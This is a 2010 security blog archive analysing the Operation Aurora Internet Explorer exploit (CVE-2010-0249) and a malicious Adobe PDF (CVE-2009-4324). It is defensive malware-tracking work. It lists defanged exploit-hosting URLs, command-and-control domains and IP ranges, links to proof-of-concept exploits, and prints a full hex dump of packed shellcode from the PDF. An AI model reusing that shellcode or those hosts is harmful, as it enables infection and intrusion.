Wednesday, January 27, 2010

using Robtex for fun and… (profit?)

During some analysis related to robtex response I have found this funny (and not so useful) way for spending yours spare time. In this case what Robtex say about “Google vs China” (Operation Aurora)

image

query used:

http://www.robtex.com/dot/www.google.com,72.14.204.103/20,as15169,72.14.204.103,chinese%20own%20google!1AS2,3NET1,4PTR0,1337A9,0UP4!4.png

Monday, January 25, 2010

CVE-2010-0249 in the wild – part 0.3

hxxxxp://h.d5d3.com/
(AS46475 LIMESTONENETWORKS Limestone Networks Inc.)

2010-01-25_174600
2010-01-25_174602

MDecoder output:

2010-01-25_174604

ThreatExpert Response:

http://www.threatexpert.com/report.aspx?md5=c229cac9ada74afaf59216fa67721be0

Sunday, January 24, 2010

CVE-2010-0249 in the wild – part 0.2

hxxxxp://www.qvodcom1.com/360/ie2.htm
(AS30058 FDCSERVERS AS for FDC Servers)

ss0003245 Click to enlarge

Malzilla and MDecoder output:

ss0003244 Click to enlarge

Wepawet analysis for hxxp://www.qvodcom1.com/360/ie2.htm:

http://wepawet.cs.ucsb.edu/view.php?hash=df830232d7e8735d15ead31b6835c30d&t=1264092203&type=js

(this post is under update)

Saturday, January 23, 2010

extraexploit blog it’s been copied

I’ve found a blog that replicate some my posts without any permission or request.

The links are: 
http://omercakir.wordpress.com/2010/01/23/cve-2010-0249-xx222-8866-org/
http://omercakir.wordpress.com/2010/01/20/cve-2010-0249-exploit-comele-hydraq-aurora-iexplorer-0day/

handled by Ömer ÇAKIR.  Can I use him as backup :) ?

Yet another security blogger that use post of other bloggers:
 http://cybero-x.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249-exploit.html

CVE-2010-0249 in the wild – part 0.1


hxxxxxp://mxd0102.3322.org/njk/index.htm
(AS4134 CHINA-TELECOM China Telecom)

image
Click to enlarge

The URL above it’s been request using (IMHO a very useful tool) MDecoder 0.4 (http://mtian.net/down/MDecoder.zip). As shown in the following picture is detected a binary file downloaded from www.ynew.net:

image Click to enlarge

Some network info from Robtex about www.ynew.net:

ss0003243
Click to enlarge

It’s been used Virustotal for a fast detection:
http://www.virustotal.com/analisis/ee58cf8312b67d69559aa0c22e1256673a07f9617fea9bc360f33c273c05df1a-1264263391

and ThreatExpert for a quick analysis about the binary above (1.exe):
http://www.threatexpert.com/report.aspx?md5=499a5da8d1b644c50607cfa9a6007dbe

From Threatexpert report,  seem once of the tons of ad hoc malware build for Chinese users.

Friday, January 22, 2010

CVE-2010-0249 in the wild - xx222.8866.org and others – part 0


(22/01/2010)

hxxxxxxxxxxtp://www.babooa562.com/xp/48/au.htm
(AS30058 FDCSERVERS AS for FDC Servers)

image


hxxxxxxxxxxtp://www.tsqzsb.cn/xp/13/au.htm
(AS4134 CHINA-TELECOM China Telecom)

image


hxxxxxxxxxp://www.fsus.cn:85/ss/au.htm
(AS35908  - VPLSNET)

image


 hxxxxxxxxxp://googleie2.23sys23.cn/pz/au.htm
(AS4213 VPLSNET)

image


hxxxxxxxxxp://www.ms8.cc/MyM/Cache/Tpl/safe.htm?13
(AS38356 TimeNet BeiJing Sincerity)

image


hxxxxxxxxxp://malegebi251.21sys21.cn/pz/au.htm
(AS4213 VPLSNET)

image

hxxxxxxxxxp://news.21npc.com/meteor/ver/ver.htm?772
(AS4134 CHINA-TELECOM China Telecom)

image




(20/01/2010)
Using Google with the information released by McAfee LABS Blog(http://bit.ly/69Pl4g)  may be trivial found others.  
 
In this case i’ve found this: hxxxxxxp://xx222.8866.org:2988/dz/ie.html  

s0000342

Wepawet doesn’t detect.

Other URLs implicated in the 1st spreading stage:

hxxxxxxp://xx222.8866.org:2988/dz/what.jpg    (shellcode)
hxxxxxxp://xx222.8866.org:2988/dz/Element
hxxxxxxp://xx222.8866.org:2988/dz/sdfasdfasdfafasdfafasdf.GIF

Others hosts:
hxxxxxxxp://tempxxp.3322.org:8277/log.css
hxxxxxxxxxp://201003.8866.org:2988/log/ie.html
hxxxxxxxxp://22cc.8866.org:2988/dz/ie.html
hxxxxxxxxp://201003.6600.org:2988/log/ie.html
hxxxxxxxxtp://201003.8800.org:2988/log/ie.html

(this post is under update)

Wednesday, January 20, 2010

IExplorer 0day CVE-2010-0249 – Exploit-Comele / Hydraq / Aurora

From Microsoft KB it’s been released an advisory related to a possible “0 day” for IExplorer 6,7 and 8.  It’s an issue used for the recent attack against Google and others big companies through an Advanced Persistent Threat:  

Why it’s been called Aurora ? (an old info)
http://www.chinadaily.com.cn/world/2007-09/27/content_6139437.htm

Operation Aurora: Clues in the Code
http://www.secureworks.com/research/blog/index.php/2010/01/20/operation-aurora-clues-in-the-code/

'Aurora' code circulated for years on English sites
http://www.theregister.co.uk/2010/01/26/aurora_attack_origins/

Report: Cyberattackers hit Google staff via friends
http://news.zdnet.co.uk/security/0,1000000189,40005860,00.htm?s_cid=248

Exploit related:
IE 0-Day on GOV.CN
http://research.zscaler.com/2010/01/ie-0-day-on-govcn.html

Internet Explorer 0-Day hosted GOV.CN domain
http://www.thetechherald.com/article.php/201004/5142/Internet-Explorer-0-Day-hosted-GOV-CN-domain

Hex-Rays against Aurora
http://hexblog.com/2010/01/hexrays_against_aurora.html

Python proof of concept:
http://packetstormsecurity.org/1001-exploits/ie_aurora.py.txt

Metasploit module / ie_aurora.rb
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb

praetorianprefect - Demonstration of exploiting the flaw using the new module from Metasploit:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/

Additional information about DEP and the Internet Explorer 0day vulnerability
http://blogs.technet.com/srd/archive/2010/01/18/additional-information-about-dep-and-the-internet-explorer-0day-vulnerability.aspx

Bypassing Browser Memory Protections - Dep and others -  (PDF document)
http://taossa.com/archive/bh08sotirovdowd.pdf
CVE-2010-0249 DEP/ASLR bypassed:
http://twitter.com/dinodaizovi

Another memory protection bypass reference:
http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

DEP and ASLR bypass
http://blog.trendmicro.com/new-exploit-bypasses-aslr-and-dep/

Detection Rules:

Sourcefire VRT Rules Update - 2010-01-15
http://www.snort.org/vrt/advisories/2010/01/15/vrt-rules-2010-01-15.html/

Mitigation strategies:

Microsoft January Out of Band Patch
http://www.microsoft.com/technet/security/bulletin/MS10-002.mspx

Note: this out of cycle patch cover also the followings CVEs:

CVE-2009-4074
CVE-2010-0027
CVE-2009-0244
CVE-2009-0245
CVE-2009-0246
CVE-2009-0247
CVE-2009-0248
CVE-2009-0249

Security Advisory 979352 – Going out of Band (Microsoft out of band patch)
http://blogs.technet.com/msrc/archive/2010/01/19/security-advisory-979352-going-out-of-band.aspx
Code to mitigate exploit:
http://www.securityfocus.com/archive/1/508961
Green is good Red is bad (client side):
http://www.mywot.com

Malware related:

Aurora PCAP file
https://www.evilfingers.com/projects/pcaps_beta.php

The Trojan.Hydraq Incident
http://www.symantec.com/connect/blogs/trojanhydraq-incident
An Insight into the Aurora Communication Protocol
http://www.avertlabs.com/research/blog/index.php/2010/01/18/an-insight-into-the-aurora-communication-protocol/

Trojan.Hydraq Exposed
http://blog.threatexpert.com/2010_01_01_archive.html

Trojan.Hydraq Exposed  part II
http://blog.threatexpert.com/2010/01/trojanhydraq-part-ii.html

Roarur.dr
http://vil.nai.com/vil/content/v_253415.htm

Exploit-Comele
http://vil.nai.com/vil/content/v_253210.htm

News and old news about:

MS knew of Aurora exploit four months before Google attacks
http://www.theregister.co.uk/2010/01/22/aurora_exploit_known_months/

Security Intelligence: Attacking the Kill Chain
https://blogs.sans.org/computer-forensics/2009/10/14/security-intelligence-attacking-the-kill-chain/

Google-China cyber espionage saga – FAQ
http://blogs.zdnet.com/security/?p=5259&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29&utm_content=Twitter

Cyber Espionage: Death by 1000 Cuts
http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20100119

France joins Germany warning against Internet Explorer
http://news.bbc.co.uk/2/hi/technology/8465038.stm
*Personal note: Firefox it’s exposed to several issues of this kind for more info Mozilla bugzilla repository it’s a good starting point.

Attacks Continuing Against IE Flaw as Microsoft Preps Patch
http://threatpost.com/en_us/blogs/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810

More on the IE zero day
http://www.sophos.com/blogs/sophoslabs/?p=8227

IBM ISS Threat Level elevated to AlertCon 2
https://webapp.iss.net/gtoc/index.html

Security expert: Chinese authorities supported cyber attacks
http://blogs.zdnet.com/BTL/?p=29667

Incidents.org said “Exploit code available for CVE-2010-0249”
http://isc.sans.org/diary.html?storyid=8002

Microsoft confirms IE zero-day behind Google attack
http://www.networkworld.com/news/2010/011510-microsoft-confirms-ie-zero-day-behind.html

Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/979352.mspx

More Details on “Operation Aurora”
http://www.avertlabs.com/research/blog/index.php/2010/01/14/more-details-on-operation-aurora/

Operation “Aurora” Hit Google, Others
http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/

0day vulnerability in Internet Explorer 6, 7 and 8
http://isc.sans.org/diary.html?storyid=7993

IE zero-day used in Chinese cyber assault on 34 firms
http://www.theregister.co.uk/2010/01/14/cyber_assault_followup/

Google Hack Attack Was Ultra Sophisticated
http://www.wired.com/threatlevel/2010/01/operation-aurora

Shellcode related:

wepawet
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
A screen shot of shellcode (md5 124722b0369b4a3dd42c6be6ecac425e)  that I have analyzed using the wepawet shell code hex dump and using http://sandsprite.com/shellcode_2_exe.php for build it.  The following shown the point of code where it’s used the urlmon.dll method to download the binary “ad.jpg” :

aurora01

Virustotal detection for the extracted shellcode above: (comele exploit detected):
http://www.virustotal.com/analisis/d6507cef78269e631e7b6dc746fae49551962a11d80efbfd2ed13f21e00f6eb2-1263694821

Anubis detection for the extracted shellcode above:
http://anubis.iseclab.org/?action=result&task_id=1936ee7010fa1ae340d09531cafb64d66&format=

Analysis of Trojan.Hydraq , aka "Aurora," against Internet Explorer
http://www.wilderssecurity.com/showthread.php?p=1608756

Hydraq / Aurora network stuff related:
Aurora files:
http://www.security.nl/files/aurorafiles.txt
from pastebin (http://pastebin.com/maad7ac3):
203.69.41.0/26
203.69.41.64/27
203.69.66.0/27
203.69.68.96/27
203.69.68.128/25
72.32.6.235

360.homeunix.com and others (at this time are parked)
http://www.symantec.com/security_response/writeup.jsp?docid=2010-
011114-1830-99&tabid=2


yahooo.8866.org (AS4766 KT-NET KORnet)
image

sl1.homelinux.org
360.homeunix.com
ftp2.homeunix.com
update.ourhobby.com
blog1.servebeer.com

This post is under update.

Monday, January 18, 2010

Is not a security bug but… (RDP - mstsc.exe / mstscax.dll crash)

It’s been detected on once of my system (XP SP3 updated to all MS bulletins. One note: the MS09-044 it was related to RDP Client Version 5.0.) this memory exception condition (under investigation) within “mstscax.dll”:

rdpcrash0001

A better view permit to locate the method exposed by ActiveX MSTSCAX.dll where is triggered the issue (CClientHandler::GetAndParseXml(void)):

image

The ActiveX dll has the following properties:

rdpcrash0003

And the following version:

rdpcrash0004

The function above is called only by two functions as shown:

image

At this time I don’t think that it’s a security issue that may be triggered from remote but searching by Google i have found a good number of links that reports same problems in older and more recent release of MSTSC (RDP Client):

http://www.google.com/#hl=en&q=mstscax.dll+crash

This search query IMHO may be used for find other possible issues since some link provided by Google are related to developer forums, or at least this kind of queries may give a good starting point for investigate on (potentially bugged) code. A good evidence is given, for example, by the following query:

googlesshot1

Note: mshtml.dll is related to CVE-2010-0249.

Tuesday, January 12, 2010

Adobe CVE-2009-4324 – Another one with AsciiHexDecode waiting for the patch day

Many thanks to contagiodump for the following PDF:

http://contagiodump.blogspot.com/2010/01/jan-7-us-j-indiastrategicdialogue-from.html

In the document above it’s been detected the following PDF “not so rare” method for obfuscating the PDF directives:

sshot001

The #<value> sequences are evaluated by Adobe PDF reader as ASCII chars. So the snippet above became the following:

sshot002

To decode stream it’s been used pdf-parser.py and redirect the object into the clearObjects :

sshot003

An interesting  decoded stream it’s show at first lookup as the following screenshot:

sshot004

As already reported very well in other web site and forum the code is ready to been analyzed with tools such as Malzilla.  So:

sshot005
sshot006

The packed shell code seems the following:

414141414141e801000000008b0c2483c4048d49124180316780399075f70d450f6
74b67670f677b67670f677767670f648067670f454b67670d670f42746667339b0f
f45583f30fa3ea78130fd55168740f30016a980f3648c5660f5e851ae40fe8957f0
60f24d9cbbc0f8ac898d30fce45fec60fe9746dcb0ffce0ec82ec93ea19b754bcd0
634c843354b503ec3d57ec2c6bec2e7bec6eec0e6fca5af45583f3126707ec225be
c2b621f64aaec3e4764ba549820ec53dc6492fe68d9615da3136fa6ad6064b7218c
965c33437b1283ec3e4364ba01ec5b1cec3e7b64ba644bdcf238cc30065af45583f
312c9e68b676f6767ec8bec209be4a762ee209bec208be4a762ee208b0d679830b7
54ae54bce75f5d12662426e75b6f5d129e24e49c6512942e64a6eee26766676754a
e26e75b6f45129ea1636f670d670fe76767670d640d670d640f676767e7ecd26766
6767318f676767673fe4a76a3732ec8bec209b9887ee2053320f6766676798308fe
ad267666767310d670d67329830bf0d670d670d650d670d670f67676727318f6767
67673fe4a76a3732ec8bec209b9887e49f6768e90b656767eee267616767ec3823e
c10530d670d673431983087ec382fa0e263616767676367670d67eae26760676737
0f67636767eae26765676737ec105331983093eca44a67636767e49f671861eefa6
361676754aeead36a67656767cb55a6a7af64e09deadb6a67656767cde09d265cea
6361676712b90d67eae2636067673798d263616767eae2676567673798d26761676
798309fe68c67636767e49c6718e398d2676167679830970d67ead267666767318f
676767673fe4a76a3732ec8bec208b98870d670d6798102b9810539830870d67eae
26760676737981037eae2676667673798105398309354a727e71b626767129fec28
37e09cea1b6267ead26766676794c3e09c0d670d670d650d670d670f67676727328
f676767673fe4a76a3732ec8bec209b9887e49f6768e95b666767eee267616767ec
385bec10530d670d673431983087ec3827a0e263616767676367670d67eae267606
767370f67636767eae2676567673731983093eca44a67636767e49f671861eefa63
6167670d67eae2636067673798d263616767eae2676567673798d26761676798309
fe68c67636767e49c6718cc98d267616767983097ead2676667670f67666767310d
679830bba1e2986767674554ae26e7db6a67666767671292a0e36a6766676745474
814e4a66301a0e36a676667674745e4a665e09c54b5ea137267cbeadb6a67666767
cd26255b67128a2ea1e36a6766676745a0e28c676767242a2349a0e288676767223
f224701a0e2946767674804a1e29267676747a0e2916767671306140ca0e29d6767
670b0e1413a1e29967676741e09ceae28c6767670d67378f676767673fe4a76a373
2ec8bec208b98870d670d98983083f7f7f7f7f7f7f70000

The VirusTotal response:

http://www.virustotal.com/analisis/6b11d73965e62de381f2ea9b2f3de4fdbf461e970fee8cb4b90e7a62f88c2aa0-1263296898

The ThreatExpert response:
http://www.threatexpert.com/report.aspx?md5=88a653e2d85649e0b4ae48a1dd711f5e

At first sight the shellcode needs to be launched in the Adobe PDF Reader context.

Friday, January 8, 2010

Trying to analyze VISPA ISP Outage

TheRegister (http://www.theregister.co.uk/2010/01/08/vispa_ddoa/) has published today a news about an outage (caused by DDOS from Latvia) for the VISPA ISP (AS29129 VISPA-ASN).  The attack seems came from Baltic area and it lasted about 12 hours (between 1.00 AM and 12.30 PM).  The following analysis is to be intend as only an attempt to verify the DDOS behavior and nothing else. 

For this purpose it’s been used the VISPA-CORE  ip prefix: (83.217.160.0/19)

prefixes
The screenshots are generated by BGPlay (http://bgplay.routeviews.org/bgplay/):
Time:2010-01-08  08:44:10
ddos001
Time:2010-01-08  09:51:49
ddos002
Time:2010-01-08  10:36:47
ddos003
Time:2010-01-08  11:17:49 (apparently no more BGP traffic for AS)
ddos004
Time:2010-01-08  12:22:30
ddos005
Feedback are welcome.